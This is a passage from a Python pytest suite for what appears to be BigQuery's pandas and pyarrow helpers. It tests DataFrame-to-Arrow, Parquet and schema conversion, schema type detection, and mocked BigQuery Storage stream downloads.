@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_type_wkb_data(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = pandas.Series([None, wkb.dumps(wkt.loads("point(0 0)"))])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == list(series)
def test_bq_to_arrow_schema_w_unknown_type(module_under_test):
fields = (
schema.SchemaField("field1", "STRING"),
schema.SchemaField("field2", "INTEGER"),
# Don't know what to convert UNKNOWN_TYPE to, let type inference work,
# instead.
schema.SchemaField("field3", "UNKNOWN_TYPE"),
)
with warnings.catch_warnings(record=True) as warned:
actual = module_under_test.bq_to_arrow_schema(fields)
assert actual is None
assert len(warned) == 1
warning = warned[0]
assert "field3" in str(warning)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_not_found(module_under_test):
dataframe = pandas.DataFrame({"not_the_column_youre_looking_for": [1, 2, 3]})
with pytest.raises(ValueError, match="col_is_missing"):
module_under_test.get_column_or_index(dataframe, "col_is_missing")
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_multiindex_not_found(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3, 4, 5, 6]},
index=pandas.MultiIndex.from_tuples(
[("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)]
),
)
with pytest.raises(ValueError, match="not_in_df"):
module_under_test.get_column_or_index(dataframe, "not_in_df")
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_both_prefers_column(module_under_test):
dataframe = pandas.DataFrame(
{"some_name": [1, 2, 3]}, index=pandas.Index([0, 1, 2], name="some_name")
)
series = module_under_test.get_column_or_index(dataframe, "some_name")
expected = pandas.Series([1, 2, 3], name="some_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_column(module_under_test):
dataframe = pandas.DataFrame({"column_name": [1, 2, 3], "other_column": [4, 5, 6]})
series = module_under_test.get_column_or_index(dataframe, "column_name")
expected = pandas.Series([1, 2, 3], name="column_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_named_index(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3]}, index=pandas.Index([4, 5, 6], name="index_name")
)
series = module_under_test.get_column_or_index(dataframe, "index_name")
expected = pandas.Series([4, 5, 6], name="index_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_datetimeindex(module_under_test):
datetimes = [
datetime.datetime(2000, 1, 2, 3, 4, 5, 101),
datetime.datetime(2006, 7, 8, 9, 10, 11, 202),
datetime.datetime(2012, 1, 14, 15, 16, 17, 303),
]
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3]},
index=pandas.DatetimeIndex(datetimes, name="index_name"),
)
series = module_under_test.get_column_or_index(dataframe, "index_name")
expected = pandas.Series(datetimes, name="index_name")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_get_column_or_index_with_multiindex(module_under_test):
dataframe = pandas.DataFrame(
{"column_name": [1, 2, 3, 4, 5, 6]},
index=pandas.MultiIndex.from_tuples(
[("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)],
names=["letters", "numbers"],
),
)
series = module_under_test.get_column_or_index(dataframe, "letters")
expected = pandas.Series(["a", "a", "b", "b", "c", "c"], name="letters")
pandas.testing.assert_series_equal(series, expected)
series = module_under_test.get_column_or_index(dataframe, "numbers")
expected = pandas.Series([0, 1, 0, 1, 0, 1], name="numbers")
pandas.testing.assert_series_equal(series, expected)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_without_named_index(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(df_data)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_named_index_same_as_column_name(
module_under_test,
):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data,
# Use same name as an integer column but a different datatype so that
# we can verify that the column is listed but the index isn't.
index=pandas.Index([0.1, 0.2, 0.3, 0.4], name="a_series"),
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(
pandas is None or PANDAS_INSTALLED_VERSION < PANDAS_MINIUM_VERSION,
reason="Requires `pandas version >= 1.0.0` which introduces pandas.NA",
)
def test_dataframe_to_json_generator(module_under_test):
utcnow = datetime.datetime.utcnow()
df_data = collections.OrderedDict(
[
("a_series", [pandas.NA, 2, 3, 4]),
("b_series", [0.1, float("NaN"), 0.3, 0.4]),
("c_series", ["a", "b", pandas.NA, "d"]),
("d_series", [utcnow, utcnow, utcnow, pandas.NaT]),
("e_series", [True, False, True, None]),
]
)
dataframe = pandas.DataFrame(
df_data, index=pandas.Index([4, 5, 6, 7], name="a_index")
)
dataframe = dataframe.astype({"a_series": pandas.Int64Dtype()})
rows = module_under_test.dataframe_to_json_generator(dataframe)
expected = [
{"b_series": 0.1, "c_series": "a", "d_series": utcnow, "e_series": True},
{"a_series": 2, "c_series": "b", "d_series": utcnow, "e_series": False},
{"a_series": 3, "b_series": 0.3, "d_series": utcnow, "e_series": True},
{"a_series": 4, "b_series": 0.4, "c_series": "d"},
]
assert list(rows) == expected
def test_dataframe_to_json_generator_repeated_field(module_under_test):
pytest.importorskip(
"pandas",
minversion=str(PANDAS_MINIUM_VERSION),
reason=(
f"Requires `pandas version >= {PANDAS_MINIUM_VERSION}` "
"which introduces pandas.NA"
),
)
df_data = [
collections.OrderedDict(
[("repeated_col", [pandas.NA, 2, None, 4]), ("not_repeated_col", "first")]
),
collections.OrderedDict(
[
("repeated_col", ["a", "b", mock.sentinel.foo, "d"]),
("not_repeated_col", "second"),
]
),
]
dataframe = pandas.DataFrame(df_data)
rows = module_under_test.dataframe_to_json_generator(dataframe)
expected = [
{"repeated_col": [pandas.NA, 2, None, 4], "not_repeated_col": "first"},
{
"repeated_col": ["a", "b", mock.sentinel.foo, "d"],
"not_repeated_col": "second",
},
]
assert list(rows) == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_named_index(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data, index=pandas.Index([4, 5, 6, 7], name="a_index")
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_index", pandas.api.types.pandas_dtype("int64")),
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_list_columns_and_indexes_with_multiindex(module_under_test):
df_data = collections.OrderedDict(
[
("a_series", [1, 2, 3, 4]),
("b_series", [0.1, 0.2, 0.3, 0.4]),
("c_series", ["a", "b", "c", "d"]),
]
)
dataframe = pandas.DataFrame(
df_data,
index=pandas.MultiIndex.from_tuples(
[(0, 0, 41), (0, 0, 42), (1, 0, 41), (1, 1, 41)],
names=[
"a_index",
# Use same name as column, but different dtype so we can verify
# the column type is included.
"b_series",
"c_index",
],
),
)
columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe)
expected = [
("a_index", pandas.api.types.pandas_dtype("int64")),
("c_index", pandas.api.types.pandas_dtype("int64")),
("a_series", pandas.api.types.pandas_dtype("int64")),
("b_series", pandas.api.types.pandas_dtype("float64")),
("c_series", pandas.api.types.pandas_dtype("object")),
]
assert columns_and_indexes == expected
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_dict_sequence(module_under_test):
df_data = collections.OrderedDict(
[
("str_column", ["hello", "world"]),
("int_column", [42, 8]),
("bool_column", [True, False]),
]
)
dataframe = pandas.DataFrame(df_data)
dict_schema = [
{"name": "str_column", "type": "STRING", "mode": "NULLABLE"},
{"name": "bool_column", "type": "BOOL", "mode": "REQUIRED"},
]
returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, dict_schema)
expected_schema = (
schema.SchemaField("str_column", "STRING", "NULLABLE"),
schema.SchemaField("int_column", "INTEGER", "NULLABLE"),
schema.SchemaField("bool_column", "BOOL", "REQUIRED"),
)
assert returned_schema == expected_schema
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_multiindex(module_under_test):
bq_schema = (
schema.SchemaField("str_index", "STRING"),
# int_index is intentionally omitted, to verify that it's okay to be
# missing indexes from the schema.
schema.SchemaField("dt_index", "DATETIME"),
schema.SchemaField("int_col", "INTEGER"),
schema.SchemaField("nullable_int_col", "INTEGER"),
schema.SchemaField("str_col", "STRING"),
)
df_data = collections.OrderedDict(
[
("int_col", [1, 2, 3, 4, 5, 6]),
("nullable_int_col", [6.0, float("nan"), 7.0, float("nan"), 8.0, 9.0]),
("str_col", ["apple", "banana", "cherry", "durian", "etrog", "fig"]),
]
)
df_index = pandas.MultiIndex.from_tuples(
[
("a", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("a", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)),
("a", 1, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("b", 1, datetime.datetime(2000, 1, 1, 0, 0, 0)),
("b", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)),
("b", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)),
],
names=["str_index", "int_index", "dt_index"],
)
dataframe = pandas.DataFrame(df_data, index=df_index)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
assert arrow_table.schema.names == [
"str_index",
"dt_index",
"int_col",
"nullable_int_col",
"str_col",
]
arrow_data = arrow_table.to_pydict()
assert arrow_data["str_index"] == ["a", "a", "a", "b", "b", "b"]
expected_dt_index = [
pandas.Timestamp(dt)
for dt in (
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
datetime.datetime(1999, 12, 31, 23, 59, 59, 999999),
datetime.datetime(2000, 1, 1, 0, 0, 0),
)
]
assert arrow_data["dt_index"] == expected_dt_index
assert arrow_data["int_col"] == [1, 2, 3, 4, 5, 6]
assert arrow_data["nullable_int_col"] == [6, None, 7, None, 8, 9]
assert arrow_data["str_col"] == [
"apple",
"banana",
"cherry",
"durian",
"etrog",
"fig",
]
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_required_fields(module_under_test):
bq_schema = (
schema.SchemaField("field01", "STRING", mode="REQUIRED"),
schema.SchemaField("field02", "BYTES", mode="REQUIRED"),
schema.SchemaField("field03", "INTEGER", mode="REQUIRED"),
schema.SchemaField("field04", "INT64", mode="REQUIRED"),
schema.SchemaField("field05", "FLOAT", mode="REQUIRED"),
schema.SchemaField("field06", "FLOAT64", mode="REQUIRED"),
schema.SchemaField("field07", "NUMERIC", mode="REQUIRED"),
schema.SchemaField("field08", "BIGNUMERIC", mode="REQUIRED"),
schema.SchemaField("field09", "BOOLEAN", mode="REQUIRED"),
schema.SchemaField("field10", "BOOL", mode="REQUIRED"),
schema.SchemaField("field11", "TIMESTAMP", mode="REQUIRED"),
schema.SchemaField("field12", "DATE", mode="REQUIRED"),
schema.SchemaField("field13", "TIME", mode="REQUIRED"),
schema.SchemaField("field14", "DATETIME", mode="REQUIRED"),
schema.SchemaField("field15", "GEOGRAPHY", mode="REQUIRED"),
)
data = {
"field01": ["hello", "world"],
"field02": [b"abd", b"efg"],
"field03": [1, 2],
"field04": [3, 4],
"field05": [1.25, 9.75],
"field06": [-1.75, -3.5],
"field07": [decimal.Decimal("1.2345"), decimal.Decimal("6.7891")],
"field08": [
decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)),
decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
],
"field09": [True, False],
"field10": [False, True],
"field11": [
datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
datetime.datetime(2012, 12, 21, 9, 7, 42, tzinfo=datetime.timezone.utc),
],
"field12": [datetime.date(9999, 12, 31), datetime.date(1970, 1, 1)],
"field13": [datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0)],
"field14": [
datetime.datetime(1970, 1, 1, 0, 0, 0),
datetime.datetime(2012, 12, 21, 9, 7, 42),
],
"field15": ["POINT(30 10)", "POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))"],
}
dataframe = pandas.DataFrame(data)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
arrow_schema = arrow_table.schema
assert len(arrow_schema) == len(bq_schema)
for arrow_field in arrow_schema:
assert not arrow_field.nullable
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_with_unknown_type(module_under_test):
bq_schema = (
schema.SchemaField("field00", "UNKNOWN_TYPE"),
schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
)
dataframe = pandas.DataFrame(
{
"field00": ["whoami", "whatami"],
"field01": ["hello", "world"],
"field02": [b"abd", b"efg"],
"field03": [1, 2],
}
)
with warnings.catch_warnings(record=True) as warned:
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
arrow_schema = arrow_table.schema
assert len(warned) == 1
warning = warned[0]
assert "field00" in str(warning)
assert len(arrow_schema) == len(bq_schema)
assert arrow_schema[0].name == "field00"
assert arrow_schema[1].name == "field01"
assert arrow_schema[2].name == "field02"
assert arrow_schema[3].name == "field03"
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_dict_sequence_schema(module_under_test):
dict_schema = [
{"name": "field01", "type": "STRING", "mode": "REQUIRED"},
{"name": "field02", "type": "BOOL", "mode": "NULLABLE"},
]
dataframe = pandas.DataFrame(
{"field01": ["hello", "world"], "field02": [True, False]}
)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, dict_schema)
arrow_schema = arrow_table.schema
expected_fields = [
pyarrow.field("field01", "string", nullable=False),
pyarrow.field("field02", "bool", nullable=True),
]
assert list(arrow_schema) == expected_fields
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_w_extra_fields(module_under_test):
with pytest.raises(ValueError) as exc_context:
module_under_test.dataframe_to_parquet(
pandas.DataFrame(), (schema.SchemaField("not_in_df", "STRING"),), None
)
message = str(exc_context.value)
assert "bq_schema contains fields not present in dataframe" in message
assert "not_in_df" in message
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_w_missing_fields(module_under_test):
with pytest.raises(ValueError) as exc_context:
module_under_test.dataframe_to_parquet(
pandas.DataFrame({"not_in_bq": [1, 2, 3]}), (), None
)
message = str(exc_context.value)
assert "bq_schema is missing fields from dataframe" in message
assert "not_in_bq" in message
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_compression_method(module_under_test):
bq_schema = (schema.SchemaField("field00", "STRING"),)
dataframe = pandas.DataFrame({"field00": ["foo", "bar"]})
write_table_patch = mock.patch.object(
module_under_test.pyarrow.parquet, "write_table", autospec=True
)
with write_table_patch as fake_write_table:
module_under_test.dataframe_to_parquet(
dataframe, bq_schema, None, parquet_compression="ZSTD"
)
call_args = fake_write_table.call_args
assert call_args is not None
assert call_args.kwargs.get("compression") == "ZSTD"
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test):
dataframe = pandas.DataFrame(
data=[
{"id": 10, "status": "FOO", "created_at": datetime.date(2019, 5, 10)},
{"id": 20, "status": "BAR", "created_at": datetime.date(2018, 9, 12)},
]
)
with warnings.catch_warnings(record=True) as warned:
detected_schema = module_under_test.dataframe_to_bq_schema(
dataframe, bq_schema=[]
)
expected_schema = (
schema.SchemaField("id", "INTEGER", mode="NULLABLE"),
schema.SchemaField("status", "STRING", mode="NULLABLE"),
schema.SchemaField("created_at", "DATE", mode="NULLABLE"),
)
by_name = operator.attrgetter("name")
assert sorted(detected_schema, key=by_name) == sorted(expected_schema, key=by_name)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "could not determine" in str(warning).lower()
]
assert not unwanted_warnings
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test):
dataframe = pandas.DataFrame(
data=[
{"struct_field": {"one": 2}, "status": "FOO"},
{"struct_field": {"two": "222"}, "status": "BAR"},
]
)
with warnings.catch_warnings(record=True) as warned:
detected_schema = module_under_test.dataframe_to_bq_schema(
dataframe, bq_schema=[]
)
assert detected_schema is None
# a warning should also be issued
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning).lower()
]
assert len(expected_warnings) == 1
assert "struct_field" in str(expected_warnings[0])
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_dataframe_to_bq_schema_geography(module_under_test):
from shapely import wkt
df = geopandas.GeoDataFrame(
pandas.DataFrame(
dict(
name=["foo", "bar"],
geo1=[None, None],
geo2=[None, wkt.loads("Point(1 1)")],
)
),
geometry="geo1",
)
bq_schema = module_under_test.dataframe_to_bq_schema(df, [])
assert bq_schema == (
schema.SchemaField("name", "STRING"),
schema.SchemaField("geo1", "GEOGRAPHY"),
schema.SchemaField("geo2", "GEOGRAPHY"),
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_no_valid_items(module_under_test):
series = pandas.Series([None, pandas.NA, float("NaN")])
result = module_under_test._first_array_valid(series)
assert result is None
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_valid_item_exists(module_under_test):
series = pandas.Series([None, [0], [1], None])
result = module_under_test._first_array_valid(series)
assert result == 0
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_all_nan_items_in_first_valid_candidate(module_under_test):
import numpy
series = pandas.Series(
[
None,
[None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan],
None,
[None, None],
[None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan, 42, None],
[1, 2, 3],
None,
]
)
result = module_under_test._first_array_valid(series)
assert result == 42
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_no_arrays_with_valid_items(module_under_test):
series = pandas.Series([[None, None], [None, None]])
result = module_under_test._first_array_valid(series)
assert result is None
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_succeeds(module_under_test):
dataframe = pandas.DataFrame(
data=[
{
"bool_field": False,
"int_field": 123,
"float_field": 3.141592,
"time_field": datetime.time(17, 59, 47),
"timestamp_field": datetime.datetime(2005, 5, 31, 14, 25, 55),
"date_field": datetime.date(2005, 5, 31),
"bytes_field": b"some bytes",
"string_field": "some characters",
"numeric_field": decimal.Decimal("123.456"),
"bignumeric_field": decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
}
]
)
# NOTE: In Pandas dataframe, the dtype of Python's datetime instances is
# set to "datetime64[ns]", and pyarrow converts that to pyarrow.TimestampArray.
    # We thus cannot expect to get DATETIME back when converting to the
# BigQuery type.
current_schema = (
schema.SchemaField("bool_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("int_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("float_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("time_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("timestamp_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("date_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("bytes_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("string_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("numeric_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("bignumeric_field", field_type=None, mode="NULLABLE"),
)
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "Pyarrow could not" in str(warning)
]
assert not unwanted_warnings
# the augmented schema must match the expected
expected_schema = (
schema.SchemaField("bool_field", field_type="BOOL", mode="NULLABLE"),
schema.SchemaField("int_field", field_type="INT64", mode="NULLABLE"),
schema.SchemaField("float_field", field_type="FLOAT64", mode="NULLABLE"),
schema.SchemaField("time_field", field_type="TIME", mode="NULLABLE"),
schema.SchemaField("timestamp_field", field_type="TIMESTAMP", mode="NULLABLE"),
schema.SchemaField("date_field", field_type="DATE", mode="NULLABLE"),
schema.SchemaField("bytes_field", field_type="BYTES", mode="NULLABLE"),
schema.SchemaField("string_field", field_type="STRING", mode="NULLABLE"),
schema.SchemaField("numeric_field", field_type="NUMERIC", mode="NULLABLE"),
schema.SchemaField(
"bignumeric_field", field_type="BIGNUMERIC", mode="NULLABLE"
),
)
by_name = operator.attrgetter("name")
assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_repeated_fields(module_under_test):
dataframe = pandas.DataFrame(
data=[
# Include some values useless for type detection to make sure the logic
# indeed finds the value that is suitable.
{"string_array": None, "timestamp_array": None, "datetime_array": None},
{
"string_array": [None],
"timestamp_array": [None],
"datetime_array": [None],
},
{"string_array": None, "timestamp_array": None, "datetime_array": None},
{
"string_array": [None, "foo"],
"timestamp_array": [
None,
datetime.datetime(
2005, 5, 31, 14, 25, 55, tzinfo=datetime.timezone.utc
),
],
"datetime_array": [None, datetime.datetime(2005, 5, 31, 14, 25, 55)],
},
{"string_array": None, "timestamp_array": None, "datetime_array": None},
]
)
current_schema = (
schema.SchemaField("string_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("timestamp_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("datetime_array", field_type=None, mode="NULLABLE"),
)
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "Pyarrow could not" in str(warning)
]
assert not unwanted_warnings
# the augmented schema must match the expected
expected_schema = (
schema.SchemaField("string_array", field_type="STRING", mode="REPEATED"),
schema.SchemaField("timestamp_array", field_type="TIMESTAMP", mode="REPEATED"),
schema.SchemaField("datetime_array", field_type="DATETIME", mode="REPEATED"),
)
by_name = operator.attrgetter("name")
assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_fails(module_under_test):
dataframe = pandas.DataFrame(
data=[
{
"status": "FOO",
"struct_field": {"one": 1},
"struct_field_2": {"foo": "123"},
},
{
"status": "BAR",
"struct_field": {"two": "111"},
"struct_field_2": {"bar": 27},
},
]
)
current_schema = [
schema.SchemaField("status", field_type="STRING", mode="NULLABLE"),
schema.SchemaField("struct_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("struct_field_2", field_type=None, mode="NULLABLE"),
]
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
assert augmented_schema is None
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning)
]
assert len(expected_warnings) == 1
warning_msg = str(expected_warnings[0])
assert "pyarrow" in warning_msg.lower()
assert "struct_field" in warning_msg and "struct_field_2" in warning_msg
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_fails_array_data(module_under_test):
dataframe = pandas.DataFrame(
data=[{"all_none_array": [None, float("NaN")], "empty_array": []}]
)
current_schema = [
schema.SchemaField("all_none_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("empty_array", field_type=None, mode="NULLABLE"),
]
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
assert augmented_schema is None
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning)
]
assert len(expected_warnings) == 1
warning_msg = str(expected_warnings[0])
assert "pyarrow" in warning_msg.lower()
assert "all_none_array" in warning_msg and "empty_array" in warning_msg
def test_dataframe_to_parquet_dict_sequence_schema(module_under_test):
pandas = pytest.importorskip("pandas")
dict_schema = [
{"name": "field01", "type": "STRING", "mode": "REQUIRED"},
{"name": "field02", "type": "BOOL", "mode": "NULLABLE"},
]
dataframe = pandas.DataFrame(
{"field01": ["hello", "world"], "field02": [True, False]}
)
write_table_patch = mock.patch.object(
module_under_test.pyarrow.parquet, "write_table", autospec=True
)
to_arrow_patch = mock.patch.object(
module_under_test, "dataframe_to_arrow", autospec=True
)
with write_table_patch, to_arrow_patch as fake_to_arrow:
module_under_test.dataframe_to_parquet(dataframe, dict_schema, None)
expected_schema_arg = [
schema.SchemaField("field01", "STRING", mode="REQUIRED"),
schema.SchemaField("field02", "BOOL", mode="NULLABLE"),
]
schema_arg = fake_to_arrow.call_args.args[1]
assert schema_arg == expected_schema_arg
def test__download_table_bqstorage_stream_includes_read_session(
monkeypatch, module_under_test
):
import google.cloud.bigquery_storage_v1.reader
import google.cloud.bigquery_storage_v1.types
monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None)
monkeypatch.setattr(bigquery_storage, "__version__", "2.5.0")
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
reader = mock.create_autospec(
google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True
)
bqstorage_client.read_rows.return_value = reader
session = google.cloud.bigquery_storage_v1.types.ReadSession()
module_under_test._download_table_bqstorage_stream(
module_under_test._DownloadState(),
bqstorage_client,
session,
google.cloud.bigquery_storage_v1.types.ReadStream(name="test"),
queue.Queue(),
mock.Mock(),
)
reader.rows.assert_called_once_with(session)
@pytest.mark.skipif(
not _helpers.BQ_STORAGE_VERSIONS.is_read_session_optional,
reason="Requires `google-cloud-bigquery-storage` >= 2.6.0",
)
def test__download_table_bqstorage_stream_omits_read_session(
monkeypatch, module_under_test
):
import google.cloud.bigquery_storage_v1.reader
import google.cloud.bigquery_storage_v1.types
monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None)
monkeypatch.setattr(bigquery_storage, "__version__", "2.6.0")
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
reader = mock.create_autospec(
google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True
)
bqstorage_client.read_rows.return_value = reader
session = google.cloud.bigquery_storage_v1.types.ReadSession()
module_under_test._download_table_bqstorage_stream(
module_under_test._DownloadState(),
bqstorage_client,
session,
google.cloud.bigquery_storage_v1.types.ReadStream(name="test"),
queue.Queue(),
mock.Mock(),
)
reader.rows.assert_called_once_with()
@pytest.mark.parametrize(
"stream_count,maxsize_kwarg,expected_call_count,expected_maxsize",
[
(3, {"max_queue_size": 2}, 3, 2), # custom queue size
(4, {}, 4, 4), # default queue size
(7, {"max_queue_size": None}, 7, 0), # infinite queue size
],
)
def test__download_table_bqstorage(
module_under_test,
stream_count,
maxsize_kwarg,
expected_call_count,
expected_maxsize,
):
from google.cloud.bigquery import dataset
from google.cloud.bigquery import table
queue_used = None # A reference to the queue used by code under test.
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
    fake_session = mock.Mock(streams=[f"stream/s{i}" for i in range(stream_count)])
bqstorage_client.create_read_session.return_value = fake_session
table_ref = table.TableReference(
dataset.DatasetReference("project-x", "dataset-y"),
"table-z",
)
def fake_download_stream(
download_state, bqstorage_client, session, stream, worker_queue, page_to_item
):
nonlocal queue_used
queue_used = worker_queue
try:
worker_queue.put_nowait("result_page")
except queue.Full: # pragma: NO COVER
pass
download_stream = mock.Mock(side_effect=fake_download_stream)
with mock.patch.object(
module_under_test, "_download_table_bqstorage_stream", new=download_stream
):
result_gen = module_under_test._download_table_bqstorage(
"some-project", table_ref, bqstorage_client, **maxsize_kwarg
)
list(result_gen)
# Timing-safe, as the method under test should block until the pool shutdown is
# complete, at which point all download stream workers have already been submitted
# to the thread pool.
assert download_stream.call_count == stream_count # once for each stream
assert queue_used.maxsize == expected_maxsize
def test_download_arrow_row_iterator_unknown_field_type(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], [2.2, 22.22, 222.222]]
pages = [fake_page]
bq_schema = [
